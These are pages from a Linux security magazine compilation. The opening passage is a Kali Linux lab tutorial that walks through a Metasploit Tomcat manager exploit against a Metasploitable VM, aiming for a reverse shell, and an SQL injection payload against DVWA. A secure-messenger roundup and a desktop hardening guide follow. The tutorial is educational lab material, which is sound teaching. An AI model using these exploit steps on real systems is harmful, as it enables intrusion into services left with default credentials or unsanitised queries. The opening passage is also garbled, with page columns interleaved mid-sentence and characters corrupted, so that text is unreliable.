thepaid-foredition.
This particular instance of Tomcat has a manager escalation vulnerability in another part of the system (the
application running at /manager/html with easy to guess distcc daemon) which you can read about in the
credentials (hint: it's tomcat/tomcat). The manager allows Unintentional Backdoors section at https://community.
arbitrary applications (packaged as WAR archives) to be rapid7.com/docs/DOC-1875. Before we go though, well look
uploaded, which is not something you really want anyone to at a textbook attack.
be able to do. No matter how you exploit a service, a common DVWA, the Damn Vulnerable Web Application, should be
accessible at http://192.168-l.10/dvwa. As

“For fun and games why you can probably fathom, it features
somewhat underwhelming security. This is

I not download a Windows XP


virtual machine.”
goal is to get shell access to the target machine. This is
usually done by starting a reverse shell on the recently
exploited machine. Once initiated, the shell will 'call back' its
immediately obvious from the login page,
which kindly tells you what the admin
password is. Log in with those details, then
select 'DVWA' from the left-hand column and
set the Script Security to low. As if things weren't bad enough
already. Now go to the SQL Injection page. The idea is that you
enter a User ID (in this case a number from 1 to 5) and the
master and enable them to enter commands with whatever script returns that user’s first and last names. It works, try it.
privileges the exploited service had. Well use a Java payload Sadly, DVWA is also vulnerable to a classic SQLi. Look at what
to achieve just this in MSF. Start MSF on the Kali machine, it's terrible things happen if you put this code into the User ID
in the 08. Exploitation Tools menu. If you see an error, wait a field: T or 1=1 #. Zoiks! The script got very confused and just
minute and try again. It has to create its database on first run returned all of the IDs. The reason for this oversharing is due
and this sometimes takes longer than it's prepared to wait. At to the underlying PHP query, which looks like:
the msf> prompt enter: Sgetid = “SELECT first_name, last_name FROM users
use exploit/multi/http/tomcat_mgr_deploy WHERE userjd = ‘$id‘”
Note the prompt changes. You can find out more about the By crafty quote mismatching, the last part of our query is
exploit by typing info . Next, we set some parameters for the then interpreted as: WHERE userjd = T or 1=1 #”.
exploit module. Change the RHOST according to the results of The double quote at the end is commented out by the #
the ip a command on the Metasploitable VM earlier: and the clause or 1=1 ensures that the WHERE expression
set RHOST 192.168.1.10 is always true. So all records are returnee. There’s really no
set RP0RT 8180 reason for this sort of coding blunder. PHP includes nice
set USERNAME tomcat functions to sanitise user input and prevent this sort of thing.
set PASSWORD tomcat But here must end our brief foray into Kali Linux, but do
set PATH /manager/html explore it further. For fun and games why not download a
set TARGET 1 Windows XP virtual machine (which you can do entirely
These are all self-explanatory except the last one, which legitimately provided you delete it after 30 days) and see how
tell MSF to create a Java payload, as opposed to something much damage you can cause with Metasploit. Hint, we
OS-specific, which won’t work for this exploit. We’re now enjoyed MS12-020. ■

The Hacker's Manual | 57


Security

Secu re
chat
While not particularly paranoid, we wouldn't want anyone to eavesdrop on our
playful banter about the Great British Bake Off with our mates.

How we tested...
We'll look at each instant messager's
mechanisms for enhancing security
and privacy, and whether any of
these has a negative effect on the
usability of the application.
We'll also keep an eye out for
applications that are cumbersome
to use and ruin the user experience
in their efforts to ensure privacy.
Some users that are exchanging
sensitive information probably won't
mind taking a hit on usability if it
ensures stronger privacy, but the
majority are unlikely to want to jump
through too many extra hoops.
We'll also keep an eye out for I Ms
that offer the same convenience and
features as their popular
counterparts. On a related note, an
IM's repository and its supported
platforms can be a key deciding
factor. Similarly, you can't get
anyone to switch to a new app if the
installation is long and drawn out.

ver the years, instant In their bid to outdo the competition, be subpoenaed. So while IM clients and

O messaging (or IM) has


evolved into a full-fledged,
feature-rich medium for
communication. Besides simple text
virtually all of the popular IM services
use their own home-brewed proprietary
protocol. However, one thing many of
them overlook is security. To offer a
services are a dime a dozen, many of
them don’t offer the level of security
and privacy that makes good sense in
this post-Snowden era. In this Roundup,
messages, a typical IM session includes better communication experience to well look at some of the best options
the exchange of images, audio and even their users, these publicly accessible available to users that are looking to
video streams. While the primary users services route all your private converse online without the fear of
of IM are home users. IM has also been exchanges via central servers that can being snooped.
adopted for use by companies behind
corporate firewalls. Both kinds of users
have a different set of requirements and
“Publicly accessible services

58 | The Hacker's Manual


a plethora of messaging services have
popped up to satiate the growing
demand for instant messaging.

I route all your private exchanges


via central servers.”
Secure chat

Security protocols
How do they secure the transmission?
The main reason for using these IM clients is because the developers have taken extra measures to ensure the security of the communication and focused on the privacy of their users. CryptoCat, for instance, works on the assumption that the network is controlled by an attacker who can intercept, tamper with and inject network messages. To maintain privacy over such a network, CryptoCat helps its users set up end-to-end encrypted chat conversations using a Double Ratchet-based encryption protocol. The users link their devices to their Cryptocat account upon connection and can identify each other's devices via the client's device manager to prevent man-in-the-middle attacks. After the initial key exchange, it also manages the ongoing renewal and maintenance of short-lived session keys during the session. All devices linked to Cryptocat accounts will receive forward secure messages, so even if the current keys are compromised the previous messages will still remain secret.

GoldBug uses end-to-end encryption with multiple layers of cryptology. In addition to RSA, it uses the El Gamal encryption algorithm and also NTRU, which is particularly regarded as resistant against quantum computing. To create more randomisation while creating keys, each user can set their individual key size, cipher, hash type, iteration count and salt-length. Furthermore, the encrypted messages are sent through a P2P self-signed SSL channel to the peer. This self-signed SSL connection is secured by a number of means to ensure that a compromised node isn't able to connect.

Jitsi supports the popular Off-the-Record (OTR) protocol to encrypt IM conversations. OTR uses a combination of 128-bit AES, along with a couple of other hash functions, to provide authentication and forward secrecy along with encryption. Jitsi also uses the ZRTP protocol to negotiate keys when it is establishing a connection via the RTP protocol to exchange audio and video.

The qTox client is based on the Tox protocol, which uses the NaCl crypto library to enforce end-to-end encryption with perfect forward secrecy. This protocol generates a temporary public/private key pair that's used to make connections to non-friend peers. The client then uses Onion routing to store and locate Tox IDs to make it practically impossible to associate users to each other.

Retroshare users generate GPG (or GnuPG) cryptographic keys and, after authentication and exchanging asymmetric keys, it establishes an end-to-end encrypted connection using OpenSSL. You can also optionally deactivate the distributed hash table (DHT) to further improve anonymity.

> You can use Retroshare over Tor to hide the connection between you and your friends.

Verdict
CryptoCat ★★★★★
Goldbug ★★★★★
Jitsi ★★★★★
qTox ★★★★★
Retroshare ★★★★★
» All use solid open source security protocols and encryption algorithms.
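Retroshare's trust model, in particular, is just public-key cryptography that you manage yourself. If you want to see what's happening under the hood, the same key-generation and exchange dance can be performed by hand with GnuPG; the email addresses and filenames below are placeholders for illustration only:
$ gpg --full-generate-key                                 # interactively create your own key pair
$ gpg --armor --export alice@example.com > alice.pub      # export the public half to hand to a friend
$ gpg --import bob.pub                                    # import the key your friend sends back
$ gpg --encrypt --sign -r bob@example.com secret.txt      # only the friend's private key can decrypt the result
Retroshare automates exactly this kind of exchange; the clients in this Roundup differ mainly in how much of the process they hide from you.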

Audio and video calls


Can they securely transmit multimedia?
While Goldbug has a good number of features, you can't use it to make audio and video calls. The application does have a mechanism to share encrypted files called Starbeam. CryptoCat also can't make real-time video calls. However, the client allows you to record minute-long encrypted video messages to your buddies that can be viewed immediately or whenever they come online within the next 30 days. CryptoCat users can also exchange encrypted files and photos as long as they are under 200MB each.

All audio and video calls made in qTox can be piped through secure channels, and it can also host group chats with other users. Similarly, Jitsi is a VoIP client and enables you to make calls using the Session Initiation Protocol (SIP). You can use Jitsi to make audio and video calls to one user or to several users on both SIP and XMPP networks.

Retroshare also enables users to make audio and video calls after they enable the VoIP plugin. One USP of this application is its ability to share large files. Retroshare uses a swarming system, which is similar to BitTorrent, to accelerate the download. Users can share files with friends or with everyone on the Retroshare network. There's also a search function to find files on the network anonymously.

> Jitsi supports TLS and certificate-based client authentication for SIP and XMPP.

Verdict
CryptoCat ★★★
Goldbug ★★
Jitsi ★★★★★
qTox ★★★★★
Retroshare ★★★★★
» CryptoCat and Goldbug can't make secure audio and video calls.


User experience
Does it make instant messaging easy to use?
All applications, and not just the ones in this Roundup, that prioritise security have their job cut out for them. They have to incorporate the extra security and privacy features without distracting the user from the main task: sending instant messages to your buddies. Since there's a good chance your friends aren't using these, as they aren't as well-known instant messengers, you'll have to convince them (or terrify them) to move. A straightforward installation procedure and an intuitive interface will go a long way in getting your buddies to sign up to yet another service. Using new applications that aren't too dissimilar to the popular ones will help both you and your friends to continue conversing without the application getting in the way.

CryptoCat ★★★★★
If it didn't insist on setting up a 12-character long password, CryptoCat would feel just like any other IM client. When you sign in for the first time, CryptoCat will generate encryption keys and store them on your new device. It'll do this every time you log into your account from a new device. Each device has a unique fingerprint that you can verify with your buddies. Once you've verified a device, you can mark it as trusted.
For additional security, you can ask CryptoCat to send messages only to trusted devices. When receiving messages, Cryptocat will always show you which device your buddy used to send that message and inform you whenever your buddy adds a new device. The IM window is the standard fare and includes buttons to record and send minute-long video messages and files.

Goldbug ★
On the first launch, you'll be asked to create authentication information and the application generates eight sets of encryption key pairs, each for a different task, such as messaging and emailing. Once the keys have been generated, you'll have to enable the kernel using the 'Activate' button. You can now connect to a chat server or the echo network and add your friends.
Initially, the project adds its own chat server as a neighbour but this is strictly for testing purposes only, and you'll have to exchange keys with your friends before you can chat. Besides the option to import and export public keys, Goldbug offers an interesting option called Repleo, which enables you to export your public key after encrypting it with a friend's already imported key. Despite its uniqueness, Goldbug has one of the most confusing interfaces and its workflow is the least intuitive.

Ease of installation
Is it newbie-proof?

Truth be told, there aren't many of us who'd be willing to migrate to a new application if the installation is found to be a long, drawn-out process. This is especially true for a desktop-centric application such as an instant messenger.

In this respect, the only application that really disappoints is GoldBug. While you can download packages for installing GoldBug from SourceForge or from its unofficial PPA, the IM only has Deb files for Ubuntu Trusty Tahr (14.04), which severely limits who can actually use the IM.

Then there's Retroshare, which only has official packages for Ubuntu and Debian. But the website lists unofficial packages for OpenSUSE, Fedora, CentOS, Mageia, Gentoo, FreeBSD and Arch Linux. There's also an unofficial build for Raspberry Pi's Raspbian called PiShare, which was released in 2014.

On the other hand, the other clients cover all the popular distros. Jitsi puts out stable and bleeding edge nightly builds as both Deb and RPM for all the popular distros, including Ubuntu, Debian, Fedora and Arch. The project also hosts repos for Ubuntu, Debian and Fedora to keep the packages updated. Similarly, you can install qTox via its official repos for Ubuntu 16.04, Debian 8, Fedora 24, OpenSUSE Leap, Tumbleweed, ARM and CentOS 7 as well as Arch Linux. CryptoCat tops the lot since there's no installation involved. You just need to extract and execute the compressed archive.

Verdict
CryptoCat ★★★★★
GoldBug ★★
Jitsi ★★★★
qTox ★★★★
Retroshare ★★★★
» Besides GoldBug, you can get the other IMs on your distro easily.

Jitsi ★★★★
Using Jitsi is fairly intuitive as well. Begin by logging into an XMPP or a SIP server or both. By default, all conversations with your contacts on either network are unsecured. You use the Secure chat pull-down menu in the chat window to bring up the options to encrypt your conversation.
When you initiate a private conversation, Jitsi will first ask you to authenticate your contact. You can do so by either asking them a shared secret or verifying their fingerprint via another authenticated channel.
For more privacy, after you've encrypted the conversation, you can ask Jitsi to stop recording the chat session with a single click from within the chat window. Similarly, you can initiate an audio and video call and secure it by comparing the four-letter ZRTP key displayed on both your screens to ensure your conversation isn't being hijacked.

Retroshare ★★★
Retroshare looks very different to a traditional IM client. On first launch, it looks rather bare and none of the tabs at the top list any content. That's because Retroshare fetches these from your friends, so you'll have to add some friends before you can view any content on the Retroshare network.
You can add friends directly by sharing your keys privately or you can exchange your keys with a chat server. You'll need to head to the chat lobbies and look up 'Chatserver EN' to join the chat, say hello and paste your key. To friend someone, you must exchange keys. You'll have access to all the forums, downloads and channels that your friends are subscribed to. Note: it will take a few hours before you get all the forums and channels from your friends.

qTox ★★★★
Like CryptoCat, the user interface of qTox resembles that of a traditional
IM client. You'll be asked to create a new profile when you first launch
the application. You can then add new contacts using one of two
methods: either by sending your Tox ID via secure means, such as
encrypted email, or, if your friends are using a Tox mobile client, you can
send them a copy of the QR code image generated by your client.
Once you're connected, you can interact as you would using a
normal IM client except for the fact that your conversation isn't flowing
through a central server. The chat window also has buttons to initiate
audio and video calls. You also get buttons to create chat groups and
send files, and there’s an option to capture and send screenshots.

Help and support


Need some handholding?

On paper, Goldbug has a manual in English as well as a detailed entry on wikibooks. In reality, however, the English documents are very crude translations of the original German manuals and, therefore, many things don't make much sense at all. We also didn't find off-site, unofficial information on the internet.

Retroshare provides a wealth of information including a FAQ, wiki, a blog and forums. The documentation covers a vast number of topics to help new users get acquainted with the Retroshare network and the app. On the forums you'll find platform-specific boards that tackle common problems and their solutions.

qTox is fairly intuitive to use, but there's also a user manual that explains the various functions and the features, while help and support is dispensed via mailing lists. The qTox-specific resources are complemented by documentation on the website of the Tox protocol. There's a FAQ and a wiki to familiarise new users with the new messaging protocol.

Besides a smattering of textual documentation, Jitsi covers a couple of useful tasks via user-contributed videos, such as initiating an encrypted chat session and making a secure ZRTP video call. For textual help, new users have a detailed FAQ. Last but not least, the help section of CryptoCat is a single-page FAQ-style document that covers everything that a user needs to know to use the application.

Verdict
CryptoCat ★★★
Goldbug ★★
Jitsi ★★★★
qTox ★★★★
Retroshare ★★★★
» Goldbug has lots of support docs but they are poorly translated.


Platform support
Can they be used on mobile and other platforms?

While you can convince your buddies to move to a different IM client with better security and privacy, you can't expect them to switch operating systems as well. Of course, in an ideal world everybody would be using GNU/Linux and this wouldn't be an issue at all. But that doesn't mean that folks using inherently less secure OSes can't use a secure IM client.

Thankfully, all the IMs in this Roundup support multiple desktop OSes in addition to Linux, but only a couple support mobile platforms. CryptoCat, Retroshare and GoldBug can all be installed on Windows and macOS as well. However, Goldbug treats Linux users as second-class citizens and only offers the latest version (3.5) to Windows and Mac users. Also, Retroshare is the only client on test here that has a build for the Raspberry Pi. Jitsi also has installers for Windows and macOS for both its stable release as well as nightly builds. The Downloads page also points to an experimental build for Android. However, the most recent APK on that page is over two years old.

The Tox protocol covers the widest range of platforms. Besides Linux, qTox has a FreeBSD port, 32-bit and 64-bit clients for Windows as well as an experimental build for macOS. While qTox itself doesn't have builds for mobile platforms, you can use it to connect with other Tox clients. There's Antidote for iOS and Antox for Android. In our tests, we didn't run into any issues IMing with users on different Tox clients and platforms.

> Antox is under active development and the performance of audio and video chat sessions varies greatly.

Verdict
CryptoCat ★★★
GoldBug ★★★
Jitsi ★★★
qTox ★★★★★
Retroshare ★★★
» qTox is interoperable with other Tox clients, which means it supports the widest range of platforms.

Extra features
What more can they do besides IM and video?

While these applications bill themselves as instant messengers, some of them can do a lot more than send simple messages. Most of them enable you to have encrypted voice and video calls and can also send files over the encrypted channels.

However, there's not much more you can do with CryptoCat than exchange encrypted text messages and securely transfer files. qTox fares a little better: its desktop users can also host group chats with other users. The application also supports ToxDNS, which is used to shorten regular Tox IDs into memorable IDs that resemble an email address, and the client includes screen-capturing capabilities to help you quickly share snapshots.

Jitsi is a full-fledged softphone that can mute, put on hold, transfer and record calls. It can also make registrar-less SIP calls to other Jitsi users on the local network. One of Jitsi's unique features is its ability to stream and share your desktop without using any of the traditional desktop streaming mechanisms, such as VNC. Jitsi also enables you to stream either the entire desktop or a portion of the screen. You can even enable your contact to remotely control your desktop. Moreover, users at both ends of a call can share their desktops with the other person at the same time. The application also has a number of enterprise-friendly features, such as support for LDAP directories.

Goldbug and Retroshare stand apart from the others in that they are much larger platforms for secure communication and enable you to interact with your friends in several different ways. Both, for example, include an email system that takes advantage of their respective peers to store and exchange encrypted messages. Goldbug can also be used to send encrypted emails over traditional POP3 and IMAP services. You can also use it to have discussions over encrypted public IRC channels in which each chat room is defined with a magnet link. In addition to email, Retroshare offers decentralised forum boards as well as a public notice board where you can paste links, vote and discuss topics in a similar way to Reddit (but perhaps without as much snark). Then there's the Channels section where you can publish your files. You can also subscribe to any of the listed channels, much like RSS feeds, to automatically download the latest published files.

> Goldbug has additional encryption tools, such as the Rosetta Cryptopad, which is an alternative to GPG and can encrypt any text for transport via traditional unsecured mediums.

Verdict
CryptoCat ★
Goldbug ★★★★
Jitsi ★★★
qTox ★★
Retroshare ★★★★★
» Goldbug and RetroShare can send encrypted emails without a mail server.

Secure Instant Messengers

The verdict
All the instant messengers in the Roundup go the extra distance to make sure you keep your conversations to yourself. We've looked at everything from simple applications that encrypt text-based communication to more complex communication suites that enable you to send email and make video calls via encrypted channels.

It's tough to recommend one over the other, so we'll rate them by the Holmesian method of elimination. Goldbug is the first to get the axe because of its confusing UI and steep learning curve. Next up is CryptoCat, which is intuitive but only secures text-based communications. Then there's qTox, which ticks many of the boxes needed to take the top spot. For starters, it isn't all that different from a traditional IM client and is equipped with all the security and privacy features you'd expect from a secure client. You can use qTox to make audio and video calls and it plays well with other Tox clients, which together cover all the major desktop and mobile OSes. However, the protocol is still relatively new and the performance of the multimedia calls isn't consistent across the various supported platforms. This is the biggest reason for qTox finding itself on the lowest step on the podium.

The runner-up spot goes to RetroShare, which walks the fine line between function and usability. The application and the network are both feature-rich and don't take too much to acclimatise to. We were impressed by RetroShare's personalisation of the peer-to-peer model into a friend-to-friend network that's totally off the grid. But it's a drastic change for any friends you want to communicate with, so we've awarded the top spot to Jitsi, which finds the right balance between form and function. Yes, it communicates via a central server, but Jitsi provides good options to encrypt sessions and prevent snooping. Also, setting up a central server on your premises doesn't take too much effort. Better still, you can use Jitsi's registrar-less SIP feature to make secure encrypted calls to users on the local network out of the box.

> Using Jitsi Videobridge, Jitsi users can easily host multi-user video calls if they have the bandwidth.

"We've awarded the top spot to Jitsi, which finds the right balance between form and function."

Jitsi ★★★★★
Web: www.jitsi.org Licence: Apache 2.0 Version: 2.9
» The best bet for securing IM without making drastic changes.

RetroShare ★★★★
Web: https://retroshare.github.io Licence: GNU GPL Version: 0.6.2
» A solid platform for communication with a slight learning curve.

qTox ★★★
Web: https://qtox.github.io Licence: GNU GPLv3 Version: 1.11.0
» A winner if it weren't for the inconsistent behaviour of the video calls.

CryptoCat
Web: https://crypto.cat Licence: GNU GPL v3 Version: 3.2.08
» Good option for encrypting text-based communications.

Goldbug
Web: http://goldbug.sourceforge.net Licence: GNU GPL Version: 3.5
» Overshadowed by a cluttered UI and poorly translated documentation.

Over to you...
Would you be willing to move yourself and your friends and family over to a secure IM? We're all ears at lxf.letters@futurenet.com.

Also consider...
Having secure conversations over the insecure open internet is a growing concern for corporations and individuals alike. This is why, in addition to the open source clients we've covered in this Roundup, there is a wide array of proprietary clients on offer as well. There's a strong possibility that your current IM client enables you to add the OTR plugin, which you can use to encrypt your chats; for example, Pidgin is one such mainstream client that comes with OTR as an optional plugin. There's also Wickr, which allows users to exchange end-to-end encrypted messages and enables them to set an expiration time on the communication. The application is available for all major mobile and desktop operating systems, but if you need a secure app for mobile-to-mobile communication, check out ChatSecure, Signal and SureSpot. They are all open source and available for both Android and iOS devices. While ChatSecure only allows text-based OTR encryption over XMPP, you can use Signal and SureSpot to make audio and video calls as well. ■
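If Pidgin is already your daily driver, adding OTR is usually just a package away; the package names below are the ones used on Debian and Ubuntu, and may differ on other distros:
$ sudo apt install pidgin pidgin-otr    # the OTR plugin ships as a separate package
Once it's installed, enable the Off-the-Record Messaging plugin from Pidgin's plugins dialogue and generate a private key for each account you want to protect.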


Linux: Secure your desktop
Linux can thwart a majority of attacks on its own, but we can help put a level 10 forcefield around your computer.
Running Linux just because you think it's safer than Windows? Think again. Security in Linux is a built-in feature and extends right from the kernel to the desktop, but it still leaves enough room to let someone muck about with your /home folder. Sure, Linux is impervious to viruses and worms written for Windows, but attackers have several other tricks up their sleeves to illegally access your precious bits and bytes that make up everything from your personal emails to your credit card details.

Locking your data behind a username and password shouldn't be your only line of defence and isn't enough to hold off a determined attacker. As the number, nature and variety of computer attacks escalate every day, you too should go out of your way and take extra measures to secure your computer against unauthorised access.

All mainstream Linux distributions such as Debian, Ubuntu and Fedora have security teams that work with the package teams to make sure you stay on top of any security vulnerabilities. Generally these teams work with each other to make sure that security patches are available as soon as a vulnerability is discovered. Your distribution will have a repository solely dedicated to security updates. All you have to do is make sure the security-specific repository is enabled (chances are it will be, by default), and choose whether you'd like to install the updates automatically or manually at the press of a button. For example, from the Updates tab in the Software & Updates app, you can ask Ubuntu to download and install security updates automatically. Always ensure your distribution is configured to install security updates immediately, without waiting for manual confirmation.

In addition to the updates, distributions also have a security mailing list to announce vulnerabilities, and also share packages to fix them. It's generally a good idea to keep an eye on the security list for your distro, and look out for any security updates to packages that are critical to you. There's a small lag between the announcement and the package being pushed to the repository; the security mailing lists guide the impatient on how to grab and install the updates manually.

You should also take some time to disable unnecessary services. A Linux desktop distro starts a number of services to be of use to as many people as possible. But you really don't need all these services. Samba, for example, shouldn't really be enabled on a secure server, and why would you need the Bluetooth service to connect to Bluetooth devices on a computer that doesn't have a Bluetooth adapter? All distributions let you control the services that run on your Linux installation, usually with a built-in graphical utility. However, some applications might stop functioning because you decided to disable a service on which they rely. For example, many server applications rely on databases, so before you turn off MySQL or PostgreSQL you should make sure you aren't running any applications that rely on them.
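On a systemd-based distro (which covers Ubuntu, Fedora, Debian and most others these days) you don't even need the graphical tool; something along these lines will show you what starts at boot and switch off anything you can live without. The Bluetooth service is just an example here:
$ systemctl list-unit-files --state=enabled         # everything set to start at boot
$ systemctl status bluetooth.service                # is it actually running right now?
$ sudo systemctl disable --now bluetooth.service    # stop it and keep it from starting again
If something does break, sudo systemctl enable --now followed by the service name puts it back.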
Secure user accounts
On a multiuser system like Linux, it's imperative that you limit access to the superuser root account. Most distributions these days don't allow you to log in as root at boot time, which is good. Furthermore, instead of giving multiple people root permission, you should grant root access on a per-command basis with the sudo command. Using sudo instead of logging in as the root user has several advantages. All actions performed with sudo are logged in the /var/log/secure file, which also records all failed attempts.

One of the major advantages of using sudo is that it allows you to restrict root access to certain commands. For this you need to make changes in the /etc/sudoers file, which should always be edited with the visudo command. The visudo command locks the sudoers file, saves edits to a temporary file, and ensures the configuration is correct before writing it to /etc/sudoers. The default editor for visudo is vi. To use nano as the visudo editor for the current shell session, set and export the EDITOR variable before calling visudo, such as EDITOR=nano visudo .

To allow a user named admin to gain full root privileges when they precede a command with sudo, add the following line in the /etc/sudoers file:
admin ALL=(ALL) ALL
To allow a user named joe to run all commands as any user but only on the machine whose hostname is viperhost:
joe viperhost=(ALL) ALL
You can also restrict access to certain commands. For example, the following line will only allow the user called susie to run the kill, shutdown, halt and reboot commands:
susie ALL = /bin/kill, /sbin/shutdown, /sbin/halt, /sbin/reboot
Similarly, the user called jack can only add and remove users:
jack ALL = /usr/sbin/adduser
You can also restrict a user's scope. The following allows the user named nate to kill unresponsive processes, but only on his workstation named tango and not anywhere else:
nate tango = KILL

On a related note, you should also set expiration dates for accounts used by non-permanent users. This can include any interns, temporary employees and consultants who need to access your Linux installation. Ideally you should immediately deactivate and remove the temporary accounts as soon as they aren't needed. The expiration date acts as a safeguard to ensure these accounts can't be misused. Use the chage command (chage -l bodhi) to get various details about a user's account, including the account expiry date and the time since the password was last changed.


> Prevent browser-based breaches with the NoScript and BetterPrivacy extensions that prevent your web browser from running malicious scripts.

Use the usermod command to tweak a user's account and set an expiration date, such as:
$ sudo usermod -e 2017-01-02 bodhi
In this example, the user named bodhi will not be able to log into the account from January 2, 2017.

Permissions primer
Another important part of securing your Linux system is setting proper permissions. In Linux and Unix, everything is a file. Directories are files, files are files and devices are files. Every file and program must be owned by a user. Each user has a unique identifier called a user ID (UID), and each user must also belong to at least one group, which is defined as a collection of users that has been established by the system administrator and can be assigned to files, folders and more. Users may belong to multiple groups. Like users, groups also have unique identifiers, called group IDs (GIDs). The accessibility of a file or program is based on its UIDs and GIDs. Users can access only what they own or have been given permission to run. Permission is granted because the user either belongs to the file's group or because the file is accessible to all users. The one exception is the root or superuser, who is allowed to access all files and programs in the system. Also, files in Linux have three kinds of permission associated with them - users, groups and others - that determine whether a user can read, write or execute a file.

You can view the permissions of a file or directory with the ls -l command. The command to use when modifying permissions is chmod. There are two ways to modify permissions, with numbers or with letters. Using letters is easier to understand for most people, but numbers are much better once you get used to them. Table 1 (over the page) lists the chmod values for each of the permission types. For example, chmod u+x somefile gives execute permissions to the owner of the file. The command chmod 744 somefile does the same thing but is expressed in numbers. Similarly, chmod g+wx somefile adds write and execute permission to the group, while chmod 764 somefile is how you'll express it with numbers.

However, this arrangement can't be used to define per-user or per-group permissions. For that, you need to employ access control lists (ACLs) that enable you to specify elaborate permissions for multiple users and groups. While you can define them manually, graphical tools such as Eiciel make the process more intuitive and help you save a lot of time and effort. You can install Eiciel from the repos of most major desktop distributions; from a security point of view, it's prudent to stick to the official repositories as much as possible, and only look elsewhere as a last resort. Once installed, the tool can be used to fine-tune the access permissions for each individual file.
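If you'd rather stay in the terminal, the same ACLs that Eiciel manipulates can be managed with the setfacl and getfacl commands; the user, group and filename below are made up for the example:
$ setfacl -m u:alice:rw report.odt     # grant the user alice read and write access
$ setfacl -m g:interns:r report.odt    # give the interns group read-only access
$ getfacl report.odt                   # review every entry attached to the file
$ setfacl -x u:alice report.odt        # remove alice's entry again
Most modern filesystems, ext4 included, normally have ACL support enabled, though on a minimal install you may need to add the acl package first.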
To get a better hang of the filesystem permissions on Linux, let's put them into practice to lock sensitive files such as the ones that house password information. The /etc/passwd file should belong to the root owner and group with 644 permissions.

Keep an eye on processes


Virtually all malicious activity happens via the processes running in the background. As part of your active security management plan, you should keep an eye on the running processes on your machine and immediately take action against any suspicious processes. You can use the top command to list all the running processes and how they are consuming available resources on your computer. If you want a more user-friendly view of the running processes, install the htop utility from the repos. Every process is assigned a process ID, or PID, which helps identify and keep track of individual processes. Use the pgrep command to list the PID of a process, such as pgrep vlc . To kill a process you can use the kill command followed by the PID (Process ID) of the unrecognised program. For example, kill -9 1934 will ask the Linux kernel to shut down the app associated with the specified PID. You can also kill a process from within the top utility. Press the k key and type the PID of the process to terminate.

> Eiciel adds an Access Control List tab in the file manager's file properties dialog window that's accessed by right-clicking over a file.

This allows users to log in and view the associated username. It'll however prevent them from modifying the /etc/passwd file directly. Then there's the /etc/shadow file, which contains encrypted passwords as well as other information such as account or password expiration values. The owner of this file is the user root while the group is often set to an administrative group, like shadow. The permissions on this file are set to 000 to prevent any user from even reading the file.

Still, while there is no access permission on the file, the root user can still access it. But if no one can access the file, how can users change their passwords, which are stored in this file? This is because the /usr/bin/passwd utility uses the special permission known as SUID. Thanks to this special provision, the user running the passwd command temporarily becomes root while the command is running and can then write to the /etc/shadow file. Similarly, the /etc/group file, which contains all the groups on the system, should have the same file permissions as the /etc/passwd file. In the same vein, the group password file, /etc/gshadow, should have the same permissions as the /etc/shadow file.
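You can see this arrangement for yourself. The exact sizes, groups and modes vary slightly between distributions, but the things to look for are the 's' in passwd's permission string (the SUID bit) and the locked-down modes on the password files:
$ ls -l /usr/bin/passwd                    # the 's' in -rwsr-xr-x marks the SUID bit
$ ls -l /etc/passwd /etc/shadow /etc/group /etc/gshadow
$ stat -c '%a %U:%G %n' /etc/shadow        # show the mode numerically, plus owner and group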
Manage passwords with PAM
The Pluggable Authentication Modules (PAM) mechanism was originally implemented in the Solaris operating system but has been a Linux mainstay for quite a while now. PAM simplifies the authentication management process and provides a flexible mechanism for authenticating users and apps. In order to reap the benefits of PAM, individual applications have to be written with support for the PAM library. The command ldd /{,usr/}{bin,sbin}/* | grep -B 5 libpam | grep '^/' will display a list of all the apps on your system that are PAM-aware in some way or the other. From the list you'll notice that many of the common Linux utilities make use of PAM.

You can also use PAM to force users to select a complex password. PAM stores its configuration files under the /etc/pam.d directory. Here you'll find a configuration file for virtually all the apps that request PAM authentication. When you look inside these configuration files, you'll notice that they all begin with calls to include other configuration files with the common- prefix. For example, the /etc/pam.d/passwd file calls the common-password file. These common-prefixed files are general configuration files whose rules should be applied in most situations.

The common-password file, among other things, controls password complexity. The cat /etc/pam.d/common-password | grep password command will list the relevant lines that define the basic rules for passwords, such as:
password [success=1 default=ignore] pam_unix.so obscure sha512
password requisite pam_deny.so
password required pam_permit.so
password optional pam_gnome_keyring.so
We're interested in the first line, which defines the rules for passwords. Some rules are already defined, such as asking for passwords to be encrypted with the SHA512 algorithm. The obscure parameter ensures complexity based on various factors such as previous passwords, the number of different types of characters and more.

For more password checking capabilities, let's install an additional PAM module with sudo apt install libpam-cracklib . Installing this module will automatically change the /etc/pam.d/common-password file, which lists the additional line:
password requisite pam_cracklib.so retry=3 minlen=8 difok=3
This line enables the pam_cracklib module and gives the users three chances to pick a good password. It also sets the minimum number of characters in the password to 8. The difok=3 option sets the minimum number of characters that must be different from the previous password.

You can append remember=5 on this line to prevent users from setting the five most recently used passwords. You can also use the dcredit, ucredit, lcredit and ocredit options to force the password to include digits, upper-case characters, lower-case characters and special-case characters. For example, you can use the following to force the user to choose a password that's not the same as the username and contains a minimum of 10 characters with at least 4 digits, 1 upper-case character and 1 special character:
password requisite pam_cracklib.so dcredit=-4 ucredit=-1 ocredit=-1 lcredit=0 minlen=10 reject_username

Obfuscate your partition
One of the best ways to keep your personal data to yourself is to encrypt it, so others cannot read the files. To this end, the installers of some leading distributions, such as Fedora, Linux Mint and Ubuntu, enable you to encrypt your entire disk during the initial set up of the distro.

If you wish to encrypt individual files, however, you can use the zuluCrypt application. What this does is block device encryption, which means that it encrypts everything written to a particular block device. The block device in question can be a whole disk, a partition or even a file mounted as a loopback device. With block device encryption, the user creates the filesystem on the block device, and the encryption layer transparently encrypts the data before writing it to the actual lower block device.


A plan for disaster recovery


A plan for recovering from a breach that results in data loss should be part of your security plan as well. There are several versatile backup utilities available for the Linux desktop user. In fact, your distribution will surely have one installed by default as well. Ubuntu, for example, ships with the simple-to-use Deja Dup tool, which you can also install on other distributions such as Fedora, OpenSUSE and Linux Mint. Most of the built-in backup tools, such as Deja Dup, have a very minimal interface, but you'll need to configure them before putting them into action. Almost every application will ask you to point it to the location where you want to house your backups. Depending on the tool you're using, this can be a local hard disk, a remote location accessible via SSH or FTP, or a web-based storage service, such as Amazon S3. You'll also have to mark the files and directories that you want to include in the backup. Some tools will also help you set up a backup schedule to automate the process. Tools such as Deja Dup will also enable you to encrypt your backups.

